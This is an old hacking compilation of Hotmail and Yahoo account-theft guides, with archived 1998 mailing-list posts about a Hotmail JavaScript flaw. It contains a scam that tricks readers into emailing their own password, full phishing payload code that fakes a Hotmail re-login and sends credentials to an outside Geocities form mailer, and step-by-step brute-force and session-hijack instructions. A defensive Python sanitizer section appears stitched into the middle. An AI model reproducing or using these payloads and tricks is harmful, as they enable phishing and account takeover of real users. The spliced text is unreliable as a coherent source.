
Tuesday, 10 July 2001 22:01:48

Troyanos en Castellano


How to Hack Hotmail and Yahoo:
1- The first thing you need is to know your victim's Hotmail account. (If you don't know what Hotmail is, you're a lamer. Find something else to do. :) )

2- Hotmail has an autoresponder that lets people who have forgotten their password (can people that stupid really exist?) and who have another Hotmail account ask for their password to be sent to that other account. Understand?

For example:
You have two accounts:
[email protected] and [email protected]
If you lose the password for one, you can ask the autoresponder to send it to the other. OK? Does this give you any ideas?

3- Now then, let's see how we use this to get someone else's password:
From your Hotmail account, send a mail to [email protected] In the subject you must put the account of the idiot you are going to hack, for example:
Subject: [email protected]

Now, how does the autoresponder check that it is really you? Very simple: YOU MUST PUT IN THE BODY OF THE MESSAGE THE EMAIL AND PASSWORD OF YOUR ACCOUNT, THAT IS, THE ONE YOU ARE USING TO SEND THIS MAIL. UNDERSTAND? E.g.: [email protected]:password
WARNING: Don't put anything else in either the subject or the body of the message, because the autoresponder won't understand it and will ignore your mail.

4- A few minutes later you check your mail and voilà! We have the lamer's password to abuse as we please. Sometimes it takes a couple of hours because the autoresponder is very busy or for who knows what damn reason. Have a little patience because it's worth it.
How to hack Yahoo

The system is the same, but you have to keep the following in mind:

1- You must send the mail to [email protected]

2- In the body of the message you must put your Yahoo address, a colon, and the password:
hacker@yahoo:password
Remember that the subject must contain the Yahoo address of the lamer you want to hack.

Have fun with this simple but effective trick, ByE

ScAnNeR




Hotmail Hack 1



Date: Wed, 26 Aug 1998 18:21:40 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail

Dear all.

I've got some e-mail-requests concerning my "second" version of the
"hotmail flaw", so I've decided to post the code. This has been tested on
IE 4.0 > and Netscape 3.0 >.

The code attached should be inserted into the mail that is sent to the
victim.

Remember. I may NOT be responsible for any of your actions, when
implementing the contents of the attached file etc.

Thankyou.

Regards

[uudecoded file below]

<html>
<meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
<head></head><body>
<P>Hotmail flaw. (second version)
<script>
errurl="http://http://www.because-we-can.com/hotmail/default.htm";
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href=errurl;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href=errurl;
}
</script>
</body>
</html>



Hotmail Hack 2



The Hotmail Hack

by Gecko321
(more details added by kM)

===========
==HOW TO==
===========

//////////
step 1
\\\\\\\\\\
Enter the hotmail ID you want to hack (remember this). This hack attempt ONLY
works if the user has not LOGGED out of hotmail. If the user has logged out this attempt
will not be successful and you will get a message saying you were logged out.



Make sure you have typed the username exactly right because hotmail will
not tell you if you have typed it incorrectly, they also log the IP's of
people entering incorrect login names.

//////////
step 2
\\\\\\\\\\

It is now time to view the html source code of the password page that you are
on now. View the source for this page. Five lines down or so from the top
of the source code page, it will say

<FORM name="passwordform"
Action="http://somenumber/cgi-bin//start/username/anothernumber" method="POST"
target="_top">

//////////
step 3
\\\\\\\\\\

Go to the address in the action part of this code.
http://somenumber/cgi-bin//start/username/anothernumber
If the hotmail user didn't logout, you will have access to their mailbox. 
If they logged out try another. =]



Some More Hotmail hacking Stuff and Tipz



Date: Mon, 24 Aug 1998 14:21:56 -0600
From: Tom Cervenka <[email protected]>
Subject: Serious Security Hole in Hotmail

We have just found a serious security hole in Microsoft's Hotmail
service (http://www.hotmail.com) which allows malicious users to easily
steal the passwords of Hotmail users. The exploit involves sending an
e-mail message that contains embedded javascript code. When a Hotmail
user views the message, the javascript code forces the user to re-login
to Hotmail. In doing so, the victim's username and password is sent to
the malicious user by e-mail. (see
http://www.because-we-can.com/hotmail/default.htm for demo)

Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:

- delete, send, and read the victim's e-mail
- check mail on other mail servers that the victim has
  configured for mail-checking
- access the victim's address book
- discover other passwords sent as confirmation of
  registration in old e-mails
- change the password of the Hotmail account

The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the javascript code into the body of
an e-mail message using a standard e-mail program such as Netscape Mail
(free). In a working demonstration and full description of this exploit
at http://www.because-we-can.com/hotmail/default.htm, it is shown that
even users without their own internet service provider (ISP) can steal
an arbitrary number of Hotmail passwords by using a free Geocities
account.

The "Hot"mail exploit is a serious security concern for the following
reasons:

1. The malicious code runs as soon as the e-mail message is viewed
2. The resources required to launch the attack are minimal and
   freely available.
3. The malicious e-mail can be sent from virtually anywhere,
   including libraries, internet cafes, or classroom terminals
4. The exploit will work with any javascript-enabled browser,
   including the Microsoft Internet Explorer and Netscape Communicator.

Both Microsoft and Hotmail have been notified that a security problem
exists. The following information about the "Hot"Mail exploit is being
made publicly available to speed the process of fixing the security hole
and inform users how they can protect themselves. This information is
also being released in the belief that when the public is aware of
serious security problems, expedient measures are taken by software
manufacturers to solve those problems.

---------------------------------------------------------------------------

Date: Tue, 25 Aug 1998 07:38:14 -0400
From: Jeff Mcadams <[email protected]>
Subject: Re: Serious Security Hole in Hotmail

Thus spake Tom Cervenka

>We have just found a serious security hole in Microsoft's Hotmail
>service (http://www.hotmail.com) which allows malicious users to easily
>steal the passwords of Hotmail users. The exploit involves sending an
>e-mail message that contains embedded javascript code. When a Hotmail
>user views the message, the javascript code forces the user to re-login
>to Hotmail. In doing so, the victim's username and password is sent to
>the malicious user by e-mail. (see
>http://www.because-we-can.com/hotmail/default.htm for demo)

This is a variation on the Spartan Horse announced by Dan Gregorie over
a week ago, and covered on news.com on the 14th. The Spartan Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com article is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d

The variation is that the Spartan Horse, as designed on the
www.thetopoftheworld.com site, mimics the Windows95/98
Dial-Up-Networking dialog box.

This wasn't originally sent to BUGTRAQ because it doesn't exploit a
specific flaw in programming code in any software, like this "Hot"Mail
exploit. Perhaps that was an oversight on Dan's and my fault, but I
did want to set the record straight on the origination of this idea for
Dan's sake.
--
Jeff McAdams Email: [email protected]
Head Network Administrator Voice: (502) 966-3848
IgLou Internet Services (800) 436-4456

---------------------------------------------------------------------------

Date: Tue, 25 Aug 1998 16:31:47 -0400
From: "Jonathan A. Zdziarski - Systems Administrator"
<[email protected]>
Subject: Re: Serious Security Hole in Hotmail

it appears that hotmail put a fix in this by s/<script>/<comment>/ or
some variation, when you view a message.

Thank you,

Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242

---------------------------------------------------------------------------

Date: Tue, 25 Aug 1998 20:14:07 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail

Hello everybody.
I studied Mr. Cervenka's e-mail and then started to experiment.
There is a way to do this to a browser that has Javascripting disabled.
Just put a META REFRESH tag into the htmlfile, the URL should point to the
URL which contains the actual capturing and sending of the password/login.
This is shown in an example below.
<html>
<meta http-equiv="refresh" content="1;
url=the-url-that-is-to-be-pointed-to">
and so on.....

Thankyou for your time.

Regards
Jonathan James

---------------------------------------------------------------------------

"HOT"MAIL EXPLOIT TARGETING NETSCAPE 4.0X USERS

This page demonstrates how we used the "Hot"Mail exploit with minimal
resources to steal passwords from Hotmail users. Our goal was to show
that using only the items listed below, we could steal a victim's
Hotmail password and remain anonymous. The following version of the
exploit has been patched by Hotmail as of Monday, August 25, 1998.
Click here to see a variation of the "Hot"Mail exploit that works
despite Hotmail's fix.

INGREDIENTS:
* 1 Computer with Internet Access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)

STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.

STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).

STEP 3:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 17 contains our Geocities username (ybwc),
from step 2.

<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508
height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\"
color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"text\" name=\"login\" size=\"16\"
maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\"
size=\"2\">Password:</font><br><input type=\"password\"
name=\"passwd\" size=\"16\" maxlength=\"16\">&nbsp;<input
type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16
border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>

STEP 4: We composed a new e-mail message to our (example) victim,
[email protected]. We inserted the file message.htm into the e-mail
message and then sent it.

STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. We
received an e-mail message from Geocities that listed the ip address,
username, and password of the Hotmail user [email protected]

---------------------------------------------------------------------------

"HOT"MAIL EXPLOIT TARGETING ANY JAVASCRIPT-ENABLED BROWSER

This page describes how users with moderate resources (web-space with
an Internet Service Provider) can use "Hot"Mail against users of any
javascript-enabled browser. We required no resources or special
hardware beyond what is listed below. Hotmail has issued a patch for
the problem; however, we have discovered a problem with their fix. The
following describes how we stole passwords from Netscape Navigator
4.0x users after Hotmail posted a fix on the morning of Monday August
25, 1998.

INGREDIENTS:
* 1 Computer with internet access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
* web-page space

STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.

STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).

STEP 3:
We opened our notepad and typed in the following text, which we then
saved as getmsg.htm. Then we uploaded the file onto our web-space.
Line 14 contains our Geocities username (ybwc), from step 2.

<html><head></head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica" size="3">Reason:&nbsp;</font>
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time
expired. Please re-login.</b></font><br>
<font face="Arial, Helvetica" size="2"><a
href="http://www.hotmail.com/errormsg.html">(Get more info
regarding error messages here)</a></font>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD=POST
ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc"
target="_top">
<INPUT TYPE="hidden" NAME="next-url"
VALUE="http://www.hotmail.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
<table cellpadding="0" cellspacing="5" border="0">
<tr><td><font face="Arial, Helvetica" size="2">Login
Name:</font><br><input type="text" name="login" size="16"
maxlength="16"></td><td><font face="Arial, Helvetica"
size="2">Password:</font><br><input type="password" name="passwd"
size="16" maxlength="16">&nbsp;<input type="submit"
value="Enter"></td><tr>
</table></form></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica" size="3">Return to <a
href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail's
Homepage</a>.
</font></th></tr></table>
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16
border=0 alt="Copyright 1996-1997">
</body></html>

STEP 4:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 4 contains the URL of the file getmsg.htm
from step 3

<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<img
src="javascript:errurl='http://www.because-we-can.com/users/anon/ho
tmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='
work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.doc
ument.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='wor
k';
top.work.document.links[i].href=errurl;}">
</body>
</html>

STEP 4: We composed a new e-mail message to our victim,
[email protected]*. We inserted the file message.htm into the e-mail
message and then sent it.

STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. It
contained an e-mail message from Geocities that listed the ip address,
username, and password of the Hotmail user [email protected]

---------------------------------------------------------------------------

HOW THE "HOT"MAIL EXPLOIT WORKS

Why does the "Hot"Mail exploit work? The security problem lies in
Microsoft's Hotmail service itself. Hotmail makes no attempt to filter
Javascript code from email messages, allowing malicious users to embed
arbitrary javascript programs into their e-mail messages. Javascript
programs do not normally constitute a security problem when they are
used in personal web-pages. However, when javascript code is embedded
into a Hotmail message, it can alter the properties of the Hotmail
user-interface itself.

In the case of the exploits we describe, the javascript alters the
properties of every link in the Hotmail interface that the user could
click on. The links are altered so that when the user clicks on them,
a (bogus) Hotmail message is displayed, informing the user that they
have timed-out of their Hotmail session and must log-in again to
continue. The (bogus) time-out page also gives the user some
text-entry fields where they can type in their username and password
to re-login. However, when the user types in their username and
password, the information is sent back to the malicious user.

In the exploits we describe, the part of the program that does the
actual "dirty-work" of mailing the password and username is provided
by Geocities as a (free) service to all their members. This should not
be viewed as an oversight or problem with Geocities, since there are
thousands of equivalent server-side mailing programs that we could
have used in its place.

The "Hot"Mail exploit is just one of many potentially damaging
javascript programs that could be embedded into mail messages. Since
javascript code in email messages can run as soon as the message is
viewed, and can alter virtually any aspect of the user interface, we
urge Hotmail to implement a javascript filter.
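
The filter urged above, and the reason the s/<script>/<comment>/ fix reported earlier in the thread was not sufficient, sketched as an added example (not code from the original page, from Hotmail, or from the posters): a tag-and-attribute allowlist built on Python's html.parser, run against constructed message bodies. The allowlist policy, collector.example and rewriteLinks() are assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist of tags -> attributes the mail viewer will render (an assumed policy).
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(),
    "font": {"face", "size", "color"},
    "a": {"href"},
    "img": {"src", "width", "height", "alt"},
    "table": {"border", "cellpadding", "cellspacing", "width"},
    "tr": {"valign"}, "td": {"align", "colspan"}, "th": {"align", "colspan"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
DROP_WITH_CONTENT = {"script", "style"}   # discard the element body as well
VOID = {"br", "img"}

def naive_filter(html):
    """Denylist fix as described in the thread: s/<script>/<comment>/."""
    return re.sub(r"<(/?)script", r"<\1comment", html, flags=re.I)

def clean_url(value):
    """Return a normalised URL if its scheme is allowlisted, else None."""
    cleaned = re.sub(r"[\x00-\x20]+", "", value or "")  # whitespace/control chars
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return None
    return cleaned if scheme in SAFE_SCHEMES else None  # relative URLs rejected too

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.removed, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
        if self._skip or tag not in ALLOWED:
            self.removed.append(tag)      # script, meta, form, input, frame, ...
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag]:
                continue                   # drops on* handlers, target, style, ...
            if name in URL_ATTRS:
                value = clean_url(value)
                if value is None:          # e.g. src="javascript:..."
                    self.removed.append(f"{tag}[{name}]")
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT and self._skip:
            self._skip -= 1
        elif not self._skip and tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

def sanitize(html):
    """Return (sanitised_html, list_of_removed_items)."""
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.removed

# Constructed sample bodies; collector.example and rewriteLinks() are placeholders.
SCRIPT_MAIL = '<p>hi</p><script>rewriteLinks()</script>'
IMG_MAIL = '<p>hi</p><img src="javascript:rewriteLinks()">'
META_MAIL = ('<html><meta http-equiv="refresh" content="1; '
             'url=http://collector.example/login.htm"><body><p>hi</p></body></html>')
```

The second value returned by sanitize() lists what was dropped, which a mail service can log as a signal that a message carried script, meta refresh or form markup.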

---------------------------------------------------------------------------

HOW TO PROTECT YOURSELF FROM "HOT"MAIL

Until Hotmail fixes the security problem, we suggest that Hotmail
users turn off javascript in their browsers. Even users familiar with
our version of the exploit may be vulnerable to other javascript
programs embedded in Hotmail messages.

Netscape users can turn javascript off in their preferences (edit /
preferences / advanced / disable javascript).

Microsoft Internet Explorer users can turn jscript off in their
preferences (view / internet options / security / custom settings /
scripting / disable active scripting).



----------------------------------------------------------------------------------------------------------------------------
980123 2.44 PM Hotmail hack guide by SnEzE V.2.0
----------------------------------------------------------------------------------------------------------------------------

There are many ways to hack hotmail, but I´m only writing the best ones. If these ways doesn´t work please mail me at [email protected] and I´ll see if U have done anything wrong or if Hotmail has changed something...
Remember that this information is for educational purposes only and U can´t blame anybody for damage U may have caused. Also remember that if anybody figures out that U have been watching in his/her account, they may be very angry...
Ok, to the hacks...
Here are the ways I like most.

____
I_1_I - Brute force hacking

a. Use telnet to connect to port 110 (Hotmail´s server)
b. Type USER and then the victim´s username
c. Type PASS and then guess a password
d. Repeat that until U have found the correct password.

!. This is called brute force hacking and requires patience. It´s better than trying to guess the victims password on hotmail homepage only because it´s faster.

____
I_2_I - The Best way

a. Get the username of the victim ( It usually stands in the address-field )
b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "
c. U´re in!

!. This hack only work if U are on the same network or computer as the victim and if he don´t log out.

____
I_3_I - The old way

a. Go to Hotmail´s homepage and get a account (if U don´t already got one)
b. Log Out
c. Now type the victims username.
d. Look at the source code.
e. On the fifth row U should find "action=someaddress"
d. Copy that address and paste it into the address-field
e. U´re in...

!. As U can see it´s a long procedure and the victim have plenty of time to log out.

____
I_4_I - Another...

a. Go to hotmail´s homepage
b. Copy the source code.
c. Make a new html file with the same code but change method=post to method=enter
d. "view" the page
e. Change the address to www.hotmail.com/ (don´t press enter!)
f. Make the victim type in his username and password
g. Look in the address-field. There you´ll see ...&password:something...

!. This is the way I use, because it lets you know the password. ( If he exits the browser U can see the password in the History folder!
I´ve made an example of this trick that you can use at: hem1.passagen.se/christog/index.htm. Good Luck!


READ!
Hotmail´s sysops have changed the "system" so that the victim may log out even if U are inside his/her account. So don´t waste U´r time!

This text comes from http://hem1.passagen.se/christog/hotmail.htm
Remember that this is V.2.0.. More will come...
